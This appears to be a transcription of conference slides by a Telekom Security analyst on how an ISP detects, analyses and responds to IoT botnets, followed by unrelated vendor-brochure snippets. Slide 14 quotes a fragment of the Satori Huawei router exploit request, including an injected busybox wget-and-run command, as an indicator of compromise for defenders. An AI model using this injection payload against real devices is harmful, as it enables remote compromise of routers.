Detect & Respond to IoT Botnets AS AN ISP. Christoph Giese Telekom Security; Cyber DefenSe Center
|
|
- Cecil Ferdinand McCormick
- 6 years ago
- Views:
Transcription
1 Detect & Respond to IoT Botnets AS AN ISP Christoph Giese Telekom Security; Cyber DefenSe Center
2 Management Summary Mirai hit us hard; IoT Botnets are on the rise and rapidly evolving We developed a three-stage model to handle this threat and proved it s value on a real-world example Work in progress; continuously improvement needed 2
3 History / Threat description The evolution of IoT botnets
4 IOT botnets on the rise Mirai Surface DDoS against OVH/Krebs Volume > 1Tbps 8 billion IoT devices* IoT Reaper Mirai source code released (Multiple clusters rising) Compromise attempt on DTAG CPEs DTAG attacker arrested Satori JenX offers 200 Gbit/s DDoS for $20 FBI took over 500k Botnet. Destructive MW 20 billion IoT devices* k routers acting as (APT) proxy exploiting UPNP You are here, having fun looking forward 2019/2020 [USENIX]; *[Gartner] 4
5 IOT botnets Rapidly evolving VPNFilter Mirai v1 1) Tries 64 user/password combinations on random IPs on port 23 2 years 2) Pre-Defined DDoS modules 3) Waiting for an IP to kill First Worm Modern malware 30y In IoT 2 years [APNIC] Graphic by [Talos] 5
6 Our three level approach Applying security best-practices on a new threat
7 We developed a three-stage model for handle Iot Botnets as ISP DETECT ANALYZE RESPOND Blackhole Monitoring Sandboxing / Reversing Payload Monitor / Block IoCs on network borders Honeypot Monitoring Customer Premises Equipment (CPE) Monitoring Anomaly Detection (Alarming) Tracking activities (DNS, pdns, Peakflow) Correlation to seen attacks Processes & Sharing Rollout of mitigations to CPE Report affected IPs to customers Inspired by the good old OODA loop (Thanks for breaking my browser with your 200+ slide 7
8 Heavily increased detection capabilities Blackhole Monitoring Monitor unused IP address ranges Fastest alerting capabilities D [Detect] A R Set of anomaly detections (Std. Deviations/Single SYN/ ) Honeypot Monitoring Worldwide honeypot network In-depth view about attacker behavior (shell history; dropped files/samples) CPE Monitoring Availability (e.g. registration rates vs baseline) Independent sensors for best coverage; Centralized monitoring for correlations Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 8
9 Analyze phase to enrich information for response Sandboxing/Reversing Analyze honeypot payload to identify IoCs Tracking Activities D A [Analyze] R pdns: First seen in Germany? (All customers DNS) pdns: FastFlux? Multiple domains? Important Peakflow: Increasing activity from customer routers? Correlation to seen attacks MISP correlations using tons of public/private feeds CTI analysts classification to seen attacks (under construction) Invest in the best sources Understand the threat Enrich information to respond Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 9
10 AS an ISP we established multiple response capabilities Protection at network borders Filtering on TCP/IP layer Sinkhole C2 domains (roadmap; german law) D A R [Respond] Rollout of mitigations to the CPE With suppliers If applicable and necessary Report affected IPs to customers Inform infected customers via postal letter ISP exchange via centralized MISP for fully-automated information exchange (under construction) Apply mitigations to protect our customers Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 10
11 Real-world examples Applying our model on the satori case
12 The blackhole sensor detected huge spike Blackhole Sensor D [Detect] A R Tolerance threshold exceeded in standard deviation :02 (UTC) Alarming in SoC: We have a large traffic spike on port TCP Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 12
13 Analyze Spike Find starting point for investigation Traffic Analysis >75k unique source IP addresses Devices are routers from North-Africa / South-America (Tunisia/Egypt) No IP addresses from our network No 3 rd level escalation over night required D A [Analyze] R IoCs IP TTL < 64 TCP Window Size: Packet length=74 Bytes Are we affected? SPEED! Determined escalation level 13
14 Sandboxing and reversing revealed IoCs Enrich detected anomaly with IoCs Sandboxing/Reversing 1. Find payload in the honeypot network 2. Analyze payload using reverse engineering 3. Share information to track malware IoCs: POST /ctrlt/deviceupgrade_1 HTTP/1.1 Host: :37215 Authorization: Digest username="dslfconfig", realm="huaweihomegateway" D A [Analyze] <NewStatusURL>$(/bin/busybox wget -g l /tmp/.f -r /b; sh /tmp/.f)</newstatusurl> <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL> Understood vulnerability Collected additional IoCs R 14
15 Respond based on impact Protection on network borders Continuous monitoring of IoCs started 24/7 team briefed D A R [Respond] Rollout of mitigations to the endpoint CPE department confirmed: Vulnerable SW not in use Vulnerable webserver not in use in home automation devices Report affected IPs to customers Internal: Not needed; External: Roadmap Apply mitigations to protect customers 15
16 Summary & Outlook DETECT Blackhole Monitoring ANALYZE Sandboxing / Reversing Payload RESPOND Monitor / Block IoCs on network borders Honeypot Monitoring Customer Premises Equipment (CPE) Monitoring Anomaly Detection (Alarming) Tracking activities (DNS, pdns, Peakflow) Correlation to seen attacks Processes & Sharing Rollout of mitigations to CPE Report affected IPs to owners 16
17 Thanks! Questions? Christoph Giese t-systems Cyber DefenSe Center
18 DISCussion - How do you handle news on vulnerabilities in IoT devices as a [manufactor, customer, ISP]? - Are you [as a CERT/CDC/SoC] interested in malicious source IP addresses from infected devices? - How should we as a security community be prepared for more and more complex IoT botnets? 18
19 Sources [Antonakakis2017] [APNIC] [Cloudflare] [Gartner] [Talos] [Wired] Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 19
20 Backup
21 Who WE ARE Goal: Protect company and their customers Cyber Defense Center & CERT SoC/s Monitoring/Feedback 24/7 Alarming Sensor Experts Continuous Improvement of capabilities FRAUD Design/Build rules for the detection mechanisms in 24/7 SoC Incident Coordination Information sharing Cyber Threat Intel Abuse [ ] Research MW Analysis Inform customers / track status 21
22 Who AM I Cyber Defense Center & CERT Design/Build rules for the detection mechanisms in 24/7 SoC Incident Coordination Information sharing Christoph Giese Work / Studies Automotive (Software Engineer; 2y) CDC/CERT (Forensics/ 3 rd level SoC / Tech CTI / SW Dev / Sec Platform; 3.5y) Msc Digital Forensics (Topic: IoC vetting; on-the-job) Open Source supporter / Music / Sports / Discussions 22
23 Threat Description Attackers view Advantages of IoT devices + 24/7 online + (Mostly) unmonitored + Poorly secured + Increasing market + Increasing computing power + Max distributed Category Consumer 5, , ,863.0 Business: Cross- Industry Business: Vertical- Specific 1, , , , , ,171.0 Grand Total 8, , ,415.4 [Gartner] Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 23
24 Rapid evolution of IOT botnets JenX 4 Mirai Copy Cats 2 IoT Reaper Rep: Advanced Flexible LUA engine 3 Rep: Advanced Not relying on infected device Mirai v1 Rep: Trivial 64 default user-pwcombinations 1 Rep: Easy Code leak paved the way to new variants Detect: Easy Still Noisy, but multiple clusters* Detect: Advanced Code updates on-thefly Rep technique not discloses assigned botnet on its own Detect: Challenge Size not easy countable Detect: Trivial Noisy & Low Tech Rep=Replication * [antonakakis2017] 24
25 Our Model for handling Iot Botnets as ISP Tracking Activities pdns: (First) seen in Germany? pdns: FastFlux? Multiple domains? Important Simple IP communication Peakflow: Increasing activity from customer routers? No anomalies D A [Analyze] CTI-Analysts classification to seen attacks Based on Mirai source code R Correlation to seen attacks MISP correlations using tons of public/private feeds First information incoming Extended timeline information Investigated additional communication channels 25
26 IntelMQ Message Bus System Collector Parser Expert Output Collector Parser Expert Expert Output Expert Output 26
27 Vetting of Indicators
Prescriptive Security Operations Centers. Leveraging big data capabilities to build next generation SOC
Prescriptive Security Operations Centers Leveraging big data capabilities to build next generation SOC Cyber Security Industry in constant renewal in 2016 and 2017 1 Tbps Mirai IoT Botnet broke the Internet
More informationCisco Advanced Malware Protection against WannaCry
Cisco Advanced Malware Protection against WannaCry "A false sense of security is worse than a true sense of insecurity" Senad Aruc Consulting Systems Engineer Advanced Threats Group Nils Roald Advanced
More informationSOLUTION BRIEF RSA NETWITNESS SUITE 3X THE IMPACT WITH YOUR EXISTING SECURITY TEAM
SOLUTION BRIEF RSA NETWITNESS SUITE 3X THE IMPACT WITH YOUR EXISTING SECURITY TEAM OVERVIEW The Verizon 2016 Data Breach Investigations Report highlights that attackers are regularly outpacing the defenders.
More informationERT Threat Alert New Risks Revealed by Mirai Botnet November 2, 2016
Abstract The Mirai botnet struck the security industry in three massive attacks that shook traditional DDoS protection paradigms, proving that the Internet of Things (IoT) threat is real and the grounds
More informationCisco Cloud Security. How to Protect Business to Support Digital Transformation
Cisco Cloud Security How to Protect Business to Support Digital Transformation Dragan Novakovic Cybersecurity Consulting Systems Engineer January 2018. Security Enables Digitization Digital Disruption,
More informationCompTIA Cybersecurity Analyst+
CompTIA Cybersecurity Analyst+ Course CT-04 Five days Instructor-Led, Hands-on Introduction This five-day, instructor-led course is intended for those wishing to qualify with CompTIA CSA+ Cybersecurity
More informationAnalyzing Huge Data for Suspicious Traffic. Christian Landström, Airbus DS
Analyzing Huge Data for Suspicious Traffic Christian Landström, Airbus DS Topics - Overview on security infrastructure - Strategies for network defense - A look at malicious traffic incl. Demos - How Wireshark
More informationIncrease Threat Detection & Incident Response
Martin Rudd Carrier Scale Network Security: Increase Threat Detection & Incident Response www.telesoft-technologies.com copyright 2017 by Telesoft Technologies. All rights reserved. Agenda Brief bio Threat
More informationIntelligent and Secure Network
Intelligent and Secure Network BIG-IP IP Global Delivery Intelligence v11.2 IP Intelligence Service Brian Boyan - b.boyan@f5.com Tony Ganzer t.ganzer@f5.com 2 Agenda Welcome & Intro Introduce F5 IP Intelligence
More informationCYBER ANALYTICS. Architecture Overview. Technical Brief. May 2016 novetta.com 2016, Novetta
CYBER ANALYTICS Architecture Overview Technical Brief May 2016 novetta.com 2016, Novetta Novetta Cyber Analytics: Technical Architecture Overview 1 INTRODUCTION 2 CAPTURE AND PROCESS ALL NETWORK TRAFFIC
More informationAutomated Threat Management - in Real Time. Vectra Networks
Automated Threat Management - in Real Time Security investment has traditionally been in two areas Prevention Phase Active Phase Clean-up Phase Initial Infection Key assets found in the wild $$$$ $$$ $$
More informationRSA Advanced Security Operations Richard Nichols, Director EMEA. Copyright 2015 EMC Corporation. All rights reserved. 1
RSA Advanced Security Operations Richard Nichols, Director EMEA 1 What is the problem we need to solve? 2 Attackers Are Outpacing Defenders..and the Gap is Widening Attacker Capabilities The defender-detection
More informationForensic Network Analysis in the Time of APTs
SharkFest 16 Forensic Network Analysis in the Time of APTs June 16th 2016 Christian Landström Senior IT Security Consultant Airbus Defence and Space CyberSecurity Topics - Overview on security infrastructure
More informationApplication Security. Rafal Chrusciel Senior Security Operations Analyst, F5 Networks
Application Security Rafal Chrusciel Senior Security Operations Analyst, F5 Networks r.chrusciel@f5.com Agenda Who are we? Anti-Fraud F5 Silverline DDOS protection WAFaaS Threat intelligence & malware
More informationRSA NetWitness Suite Respond in Minutes, Not Months
RSA NetWitness Suite Respond in Minutes, Not Months Overview One can hardly pick up a newspaper or turn on the news without hearing about the latest security breaches. The Verizon 2015 Data Breach Investigations
More informationAKAMAI THREAT ADVISORY. Satori Mirai Variant Alert
AKAMAI THREAT ADVISORY Satori Mirai Variant Alert Version: V002 Date: December 6, 2017 1.0 / Summary / Akamai, along with industry peers, has identified an updated variant of Mirai (Satori) that has activated
More informationRSA Security Analytics
RSA Security Analytics This is what SIEM was Meant to Be 1 The Original Intent of SIEM Single compliance & security interface Analyze & prioritize alerts across various sources The cornerstone of security
More informationTOP TEN DNS ATTACKS PROTECTING YOUR ORGANIZATION AGAINST TODAY S FAST-GROWING THREATS
TOP TEN DNS ATTACKS PROTECTING YOUR ORGANIZATION AGAINST TODAY S FAST-GROWING THREATS 1 Introduction Your data and infrastructure are at the heart of your business. Your employees, business partners, and
More informationTHE RSA SUITE NETWITNESS REINVENT YOUR SIEM. Presented by: Walter Abeson
THE RSA NETWITNESS SUITE REINVENT YOUR SIEM Presented by: Walter Abeson 1 Reality Goals GOALS VERSUS REALITY OF SIEM 1.0 Single compliance & security interface Analyze & prioritize alerts across various
More informationFigure 1: Attempts for /ws/v1/cluster/apps/new-application
ERT Threat Alert DemonBot October 26, 2018 Abstract Radware s Threat Research Center is monitoring and tracking a malicious agent that is leveraging a Hadoop YARN unauthenticated remote command execution
More informationAn Aflac Case Study: Moving a Security Program from Defense to Offense
SESSION ID: CXO-W11 An Aflac Case Study: Moving a Security Program from Defense to Offense Tim Callahan SVP & Global CISO Aflac Threat Landscape Selected losses > 30,000 records (updated 10/15/16) Security
More informationThink You re Safe from DDoS Attacks? As an AWS customer, you probably need more protection. Discover the vulnerabilities and how Neustar can help.
Think You re Safe from DDoS Attacks? As an AWS customer, you probably need more protection. Discover the vulnerabilities and how Neustar can help. www.home.neustar 02 Think You're Safe from DDos Attacks?
More informationSecurity Operations 2018: What is Working? What is Not.
SESSION ID: TTA-F03 Security Operations 2018: What is Working? What is Not. Kerry Matre Security Operations Strategist Palo Alto Networks 2 How did we get here? Today Short Description Q1 20YY 01 Milestone
More informationComprehensive datacenter protection
Comprehensive datacenter protection There are several key drivers that are influencing the DDoS Protection market: DDoS attacks are increasing in frequency DDoS attacks are increasing in size DoS attack
More informationRSA INCIDENT RESPONSE SERVICES
RSA INCIDENT RESPONSE SERVICES Enabling early detection and rapid response EXECUTIVE SUMMARY Technical forensic analysis services RSA Incident Response services are for organizations that need rapid access
More informationSOLUTION BRIEF RSA NETWITNESS EVOLVED SIEM
RSA NETWITNESS EVOLVED SIEM OVERVIEW A SIEM is technology originally intended for compliance and log management. Later, as SIEMs became the aggregation points for security alerts, they began to be more
More informationAutomated Response in Cyber Security SOC with Actionable Threat Intelligence
Automated Response in Cyber Security SOC with Actionable Threat Intelligence while its biggest weakness is lack of visibility: SOCs still can t detect previously unknown threats, which is a consistent
More informationEvolution Of Cyber Threats & Defense Approaches
Evolution Of Cyber Threats & Defense Approaches Antony Abraham IT Architect, Information Security, State Farm Kevin McIntyre Tech Lead, Information Security, State Farm Agenda About State Farm Evolution
More informationRadware Attack Mitigation Solution (AMS) Protect Online Businesses and Data Centers Against Emerging Application & Network Threats - Whitepaper
Radware Attack Mitigation Solution (AMS) Protect Online Businesses and Data Centers Against Emerging Application & Network Threats - Whitepaper Table of Contents Abstract...3 Understanding Online Business
More informationWHITE PAPER. Operationalizing Threat Intelligence Data: The Problems of Relevance and Scale
WHITE PAPER Operationalizing Threat Intelligence Data: The Problems of Relevance and Scale Operationalizing Threat Intelligence Data: The Problems of Relevance and Scale One key number that is generally
More informationReducing the Cost of Incident Response
Reducing the Cost of Incident Response Introduction Cb Response is the most complete endpoint detection and response solution available to security teams who want a single platform for hunting threats,
More informationAllot IoT Defense Solutions for Enterprises to Ensure IoT Service Continuity. Solution Brief
Allot IoT Defense Solutions for Enterprises to Ensure IoT Service Continuity Solution Brief Contents 1 Allot IoT Defense Solutions for Enterprises to Ensure IoT Service Continuity... 1 2 IoT Service Protection...
More informationddos-guard.net Protecting your business DDoS-GUARD: Distributed protection against distributed attacks
ddos-guard.net Protecting your business DDoS-GUARD: Distributed protection against distributed attacks 2 WHAT IS A DDOS-ATTACK AND WHY ARE THEY DANGEROUS? Today's global network is a dynamically developing
More informationNational Cyber Security Operations Center (N-CSOC) Stakeholders' Conference
National Cyber Security Operations Center (N-CSOC) Stakeholders' Conference Benefits to the Stakeholders A Collaborative and Win-Win Strategy Lal Dias Chief Executive Officer Sri Lanka CERT CC Cyber attacks
More informationForeScout Extended Module for Splunk
Enterprise Strategy Group Getting to the bigger truth. ESG Lab Review ForeScout Extended Module for Splunk Date: May 2017 Author: Tony Palmer, Senior Lab Analyst Abstract This report provides a first look
More informationWHITE PAPER HIGH-FIDELITY THREAT INTELLIGENCE: UNDERSTANDING FALSE POSITIVES IN A MULTI-LAYER SECURITY STRATEGY
WHITE PAPER HIGH-FIDELITY THREAT INTELLIGENCE: UNDERSTANDING FALSE POSITIVES IN A MULTI-LAYER SECURITY STRATEGY Dave Dubois, Global Security Product Management Version: 1.0, Jan 2018 A Multi-Layer Approach
More informationThreat Detection and Mitigation for IoT Systems using Self Learning Networks (SLN)
Threat Detection and Mitigation for IoT Systems using Self Learning Networks (SLN) JP Vasseur, PhD - Cisco Fellow jpv@cisco.com Maik G. Seewald, CISSP Sr. Technical Lead maseewal@cisco.com June 2016 Cyber
More informationSIEM Overview with OSSIM Case Study. Mohammad Husain, PhD Cal Poly Pomona
SIEM Overview with OSSIM Case Study Mohammad Husain, PhD Cal Poly Pomona 1 SIEM SIEM = Security Information and Event Management Collects security information from multiple sources; internal and external
More informationEFFECTIVELY TARGETING ADVANCED THREATS. Terry Sangha Sales Engineer at Trustwave
EFFECTIVELY TARGETING ADVANCED THREATS Terry Sangha Sales Engineer at Trustwave THE CHALLENGE PROTECTING YOUR ENVIRONMENT IS NOT GETTING EASIER ENDPOINT POINT OF SALE MOBILE VULNERABILITY MANAGEMENT CYBER
More informationEndpoint Protection : Last line of defense?
Endpoint Protection : Last line of defense? First TC Noumea, New Caledonia 10 Sept 2018 Independent Information Security Advisor OVERVIEW UNDERSTANDING ENDPOINT SECURITY AND THE BIG PICTURE Rapid development
More informationStopping Advanced Persistent Threats In Cloud and DataCenters
Stopping Advanced Persistent Threats In Cloud and DataCenters Frederik Van Roosendael PSE Belgium Luxembourg 10/9/2015 Copyright 2013 Trend Micro Inc. Agenda How Threats evolved Transforming Your Data
More informationSecurity analytics: From data to action Visual and analytical approaches to detecting modern adversaries
Security analytics: From data to action Visual and analytical approaches to detecting modern adversaries Chris Calvert, CISSP, CISM Director of Solutions Innovation Copyright 2013 Hewlett-Packard Development
More informationOrchestrating and Automating Trend Micro TippingPoint and IBM QRadar
Orchestrating and Automating Trend Micro TippingPoint and IBM QRadar Response Automation SOCAutomation is an information security automation and orchestration platform that transforms incident response.
More informationThe Evolution of : Continuous Advanced Threat Protection
The Evolution of : Continuous Advanced Threat Protection Craig Bird Senior Solutions Engineer Security is a combination of protection, detection and response You need Prevention to defend against low-focus
More informationSIEM (Security Information Event Management)
SIEM (Security Information Event Management) Topic: SECURITY and RISK Presenter: Ron Hruby Topics Threat landscape Breaches and hacks Leadership and accountability Evolution of security technology What
More informationProtecting Against Modern Attacks. Protection Against Modern Attack Vectors
Protecting Against Modern Attacks Protection Against Modern Attack Vectors CYBER SECURITY IS A CEO ISSUE. - M C K I N S E Y $4.0M 81% >300K 87% is the average cost of a data breach per incident. of breaches
More informationSymantec Ransomware Protection
Symantec Ransomware Protection Protection Against Ransomware Defense in depth across all control points is required to stop ransomware @ Email Symantec Email Security.cloud, Symantec Messaging Gateway
More informationRSA INCIDENT RESPONSE SERVICES
RSA INCIDENT RESPONSE SERVICES Enabling early detection and rapid response EXECUTIVE SUMMARY Technical forensic analysis services RSA Incident Response services are for organizations that need rapid access
More informationCourse Outline Topic 1: Current State Assessment, Security Operations Centers, and Security Architecture
About this Course This course will best position your organization to analyse threats and detect anomalies that could indicate cybercriminal behaviour. The payoff for this new proactive approach would
More informationHOW TO ANALYZE AND UNDERSTAND YOUR NETWORK
Handbook HOW TO ANALYZE AND UNDERSTAND YOUR NETWORK Part 3: Network Traffic Monitoring or Packet Analysis? by Pavel Minarik, Chief Technology Officer at Flowmon Networks www.flowmon.com In previous two
More informationExploring CVE , a Skeleton key in DNS. Jaime Cochran, Marek Vavrusa
Exploring CVE-2015-7547, a Skeleton key in DNS Jaime Cochran, Marek Vavrusa What is this about? Vulnerability in glibc DNS clients Similar to CVE-2015-0235 GHOST 2015-07-13 reported 2016-02-16 disclosed
More informationChair for Network Architectures and Services Department of Informatics TU München Prof. Carle. Network Security. Chapter 8
Chair for Network Architectures and Services Department of Informatics TU München Prof. Carle Network Security Chapter 8 System Vulnerabilities and Denial of Service Attacks System Vulnerabilities and
More informationINTRODUCTION: DDOS ATTACKS GLOBAL THREAT INTELLIGENCE REPORT 2015 :: COPYRIGHT 2015 NTT INNOVATION INSTITUTE 1 LLC
INTRODUCTION: DDOS ATTACKS 1 DDOS ATTACKS Though Denial of Service (DoS) and Distributed Denial of Service (DDoS) have been common attack techniques used by malicious actors for some time now, organizations
More informationTrend Micro and IBM Security QRadar SIEM
Trend Micro and IBM Security QRadar SIEM Ellen Knickle, PM QRadar Integrations Robert Tavares, VP IBM Strategic Partnership February 19, 2014 1 Agenda 1. Nature of the IBM Relationship with Trend Micro
More informationComprehensive DDoS Attack Protection: Cloud-based, Enterprise Grade Mitigation F5 Silverline
Comprehensive DDoS Attack Protection: Cloud-based, Enterprise Grade Mitigation F5 Silverline PRESENTED BY: RICH BIBLE, EMEA SILVERLINE SA November 22, 2018 1 2018 F5 NETWORKS DDoS and Application Attack
More informationATTIVO NETWORKS THREATDEFEND INTEGRATION WITH MCAFEE SOLUTIONS
PARTNER BRIEF ATTIVO NETWORKS THREATDEFEND INTEGRATION WITH MCAFEE SOLUTIONS INTRODUCTION Attivo Networks has partnered with McAfee to detect real-time in-network threats and to automate incident response
More informationDetect Cyber Threats with Securonix Proxy Traffic Analyzer
Detect Cyber Threats with Securonix Proxy Traffic Analyzer Introduction Many organizations encounter an extremely high volume of proxy data on a daily basis. The volume of proxy data can range from 100
More informationEMERGING THREATS & STRATEGIES FOR DEFENSE. Paul Fletcher Cyber Security
EMERGING THREATS & STRATEGIES FOR DEFENSE Paul Fletcher Cyber Security Evangelist @_PaulFletcher Threats by Customer Environment Cloud Environment On Premise Environment 1.96% 0.13% 0.02% application-attack
More informationCASE STUDY: REGIONAL BANK
CASE STUDY: REGIONAL BANK Concerned about unauthorised network traffic, a regional bank in the MD/DC/VA area contracted GBMS Tech Ltd to monitor the banks various security systems. GBMS Tech Ltd uncovered
More informationFrom Managed Security Services to the next evolution of CyberSoc Services
From Managed Security Services to the next evolution of CyberSoc Services Gianluca Busco Arré Country Manager pandasecurity.com MSSP / MDR Where the Industry is going leaders and laggers MSSP industry
More informationUTM 5000 WannaCry Technote
UTM 5000 WannaCry Technote The news is full of reports of the massive ransomware infection caused by WannaCry. Although these security threats are pervasive, and ransomware has been around for a decade,
More informationDoS Cyber Attack on a Government Agency in South America- February 2012 Anonymous Mobile LOIC in Action
DoS Cyber Attack on a Government Agency in South America- February 2012 Anonymous Mobile LOIC in Action 1 Table of Content Preamble...3 About Radware s DefensePro... 3 About Radware s Emergency Response
More informationPULLING OUR SOCS UP VODAFONE GROUP AT RSAC Emma Smith. Andy Talbot. Group Technology Security Director Vodafone Group Plc
#RSAC SESSION ID: AIR-R04 PULLING OUR SOCS UP VODAFONE GROUP AT RSAC 2018 Emma Smith Group Technology Security Director Vodafone Group Plc Andy Talbot Global Head of Cyber Defence Vodafone Group Plc Pulling
More informationBUILDING CYBERSECURITY CAPABILITY, MATURITY, RESILIENCE
BUILDING CYBERSECURITY CAPABILITY, MATURITY, RESILIENCE 1 WHAT IS YOUR SITUATION? Excel spreadsheets Manually intensive Too many competing priorities Lack of effective reporting Too many consultants Not
More informationA Simple Guide to Understanding EDR
2018. 08. 22 A Simple Guide to Understanding EDR Proposition for Adopting Next-generation Endpoint Security Technology 220, Pangyoyeok-ro, Bundang-gu, Seongnam-si, Gyeonggi-do, South Korea Tel: +82-31-722-8000
More informationDEFENCE IN DEPTH HOW ANTIVIRUS, TRADITIONAL FIREWALLS, AND DNS FIREWALLS WORK TOGETHER
DEFENCE IN DEPTH HOW ANTIVIRUS, TRADITIONAL FIREWALLS, AND DNS FIREWALLS WORK TOGETHER D-Zone DNS Firewall 18-10-20171 EXECUTIVE SUMMARY Cyber attacks continue to grow at an alarming rate with ransomware
More informationActive defence through deceptive IPS
Active defence through deceptive IPS Authors Apostolis Machas, MSc (Royal Holloway, 2016) Peter Komisarczuk, ISG, Royal Holloway Abstract Modern security mechanisms such as Unified Threat Management (UTM),
More informationAvoiding Information Overload: Automated Data Processing with n6
Avoiding Information Overload: Automated Data Processing with n6 Paweł Pawliński pawel.pawlinski@cert.pl 26th annual FIRST conference Boston, June 23rd 2014 Who we are part of national CERT for Poland
More informationSecurity Operations & Analytics Services
Security Operations & Analytics Services www.ecominfotech.biz info@ecominfotech.biz Page 1 Key Challenges Average time to detect an attack (Dwell time) hovers around 175 to 210 days as reported by some
More informationWith turing you can: Identify, locate and mitigate the effects of botnets or other malware abusing your infrastructure
Decoding DNS data If you have a large DNS infrastructure, understanding what is happening with your real-time and historic traffic is difficult, if not impossible. Until now, the available network management
More informationEnhancing Threat Intelligence Data. 05/24/2017 DC416
Enhancing Threat Intelligence Data By @3ncr1pted 05/24/2017 DC416 Security consultant researcher/analyst in Threat Intel. Loves APTs, mainframes, ICS SCADA & creating security awareness StarTrek! Boldly
More information2. INTRUDER DETECTION SYSTEMS
1. INTRODUCTION It is apparent that information technology is the backbone of many organizations, small or big. Since they depend on information technology to drive their business forward, issues regarding
More informationImproved C&C Traffic Detection Using Multidimensional Model and Network Timeline Analysis
Improved C&C Traffic Detection Using Multidimensional Model and Elad Menahem Avidan Avraham Modern Threats Are More Sophisticated & Evasive CYBER KILL CHAIN: Infection Phase Post-Infection Recon Weaponization
More informationAn Aflac Case Study: Moving a Security Program from Defense to Offense
SESSION ID: TTA-F02 An Aflac Case Study: Moving a Security Program from Defense to Offense Tim Callahan SVP & Global Chief Security Officer Aflac Threat Landscape Security risks are growing at a faster
More informationNovetta Cyber Analytics
Know your network. Arm your analysts. Introduction Novetta Cyber Analytics is an advanced network traffic analytics solution that empowers analysts with comprehensive, near real time cyber security visibility
More informationKey Technologies for Security Operations. Copyright 2014 EMC Corporation. All rights reserved.
Key Technologies for Security Operations 2 Traditional Security Is Not Working 97% of breaches led to compromise within days or less with 72% leading to data exfiltration in the same time Source: Verizon
More informationCisco Firepower NGFW. Anticipate, block, and respond to threats
Cisco Firepower NGFW Anticipate, block, and respond to threats Digital Transformation on a Massive Scale 15B Devices Today Attack Surface 500B Devices In 2030 Threat Actors $19T Opportunity Next 10 Years
More informationRSA ECAT DETECT, ANALYZE, RESPOND!
RSA ECAT DETECT, ANALYZE, RESPOND! Cyber Threat Landscape Attack surface (& attackers) expanding Web app Existing strategies & controls are failing Laptop EHR Firewall Attacks sophistication on the rise
More informationDDoS Protector. Simon Yu Senior Security Consultant. Block Denial of Service attacks within seconds CISSP-ISSAP, MBCS, CEH
DDoS Protector Block Denial of Service attacks within seconds Simon Yu Senior Security Consultant CISSP-ISSAP, MBCS, CEH 2012 Check Point Software Technologies Ltd. [PROTECTED] All rights reserved. 2012
More informationCisco Security. Advanced Malware Protection. Guillermo González Security Systems Engineer Octubre 2017
Cisco Security Advanced Malware Protection Guillermo González Security Systems Engineer Octubre 2017 The New Security Model Attack Continuum Before During After Before Discover During Detect After Scope
More informationCisco Stealthwatch Endpoint License
Data Sheet Cisco Stealthwatch Endpoint License With the Cisco Stealthwatch Endpoint License you can conduct in-depth, context-rich investigations into endpoints that exhibit suspicious behavior. In our
More informationUn SOC avanzato per una efficace risposta al cybercrime
Un SOC avanzato per una efficace risposta al cybercrime Identificazione e conferma di un incidente @RSAEMEA #RSAEMEASummit @masiste75 Mauro Costantini - Presales Consultant Agenda A look into the threat
More informationResolving Security s Biggest Productivity Killer
cybereason Resolving Security s Biggest Productivity Killer How Automated Detection Reduces Alert Fatigue and Cuts Response Time 2016 Cybereason. All rights reserved. 1 In today s security environment,
More informationHoneypots observations and their usefulness
Honeypots observations and their usefulness Gerard Wagener - TLP:WHITE CIRCL March 15, 2017 The Computer Incident Response Center Luxembourg (CIRCL) is a government-driven initiative designed to provide
More informationQuickSpecs. Aruba IntroSpect User and Entity Behavior Analytics. Overview. Aruba IntroSpect User and Entity Behavior Analytics Product overview
Overview Product overview Aruba s User and Entity Behavior Analytics (UEBA) solution, Aruba IntroSpect, detects attacks by spotting small changes in behavior that are often indicative of attacks that have
More informationTHE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION BREACH & ATTACK SIMULATION
BREACH & ATTACK SIMULATION THE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION Cymulate s cyber simulation platform allows you to test your security assumptions, identify possible security gaps and receive
More informationA MULTILAYERED SECURITY APPROACH TO KEEPING HEALTHCARE DATA SECURE
SESSION ID: SPO2-W12 A MULTILAYERED SECURITY APPROACH TO KEEPING HEALTHCARE DATA SECURE Frank Bunton VP, CISO MedImpact Healthcare Systems, Security @frankbunton Larry Biggs Security Engineer III - Threat
More informationCyber Security Guidelines for Securing Home and Small Office Routers
Cyber Security Guidelines for Securing Home and Small Office Routers Author: CS Risk Management Section Document Published Date: March 2018 Document History: Version Description Date 1.0 Published V1.0
More informationArbor Networks Spectrum. Wim De Niel Consulting Engineer EMEA
Arbor Networks Spectrum Wim De Niel Consulting Engineer EMEA wdeniel@arbor.net Arbor Spectrum for Advanced Threats Spectrum Finds Advanced Threats with Network Traffic Unlocks Efficiency to Detect, Investigate,
More informationCompare Security Analytics Solutions
Compare Security Analytics Solutions Learn how Cisco Stealthwatch compares with other security analytics products. This solution scales easily, giving you visibility across the entire network. Stealthwatch
More informationSOC Operations on the Autobahn. Don t let the green grass fool you
SOC Operations on the Autobahn Don t let the green grass fool you Who am I? Adrian Kelley 15+ Years of IT Experience Current: Sands Corp. (Vulnerability Management Engineer) United States Computer Emergency
More informationDoS Cyber Attack on a Government Agency in Europe- April 2012 Constantly Changing Attack Vectors
DoS Cyber Attack on a Government Agency in Europe- April 2012 Constantly Changing Attack Vectors 1 Table of Content Preamble...3 About Radware s DefensePro... 3 About Radware s Emergency Response Team
More informationsnoc Snoc DDoS Protection Fast Secure Cost effective Introduction Snoc 3.0 Global Scrubbing Centers Web Application DNS Protection
Snoc DDoS Protection Fast Secure Cost effective sales@.co.th www..co.th securenoc Introduction Snoc 3.0 Snoc DDoS Protection provides organizations with comprehensive protection against the most challenging
More informationStealthwatch ülevaade + demo ja kasutusvõimalused. Leo Lähteenmäki
Stealthwatch ülevaade + demo ja kasutusvõimalused Leo Lähteenmäki 09:00-9:30 Hommikukohv ja registreerimine 09:30 11:15 Stealthwatch ülevaade + demo ja kasutusvõimalused 11:00 11:15 Kohvipaus 11:15 12:00
More informationThreat Containment and Operations. Yong Kwang Kek, Director of Presales SE, APJ
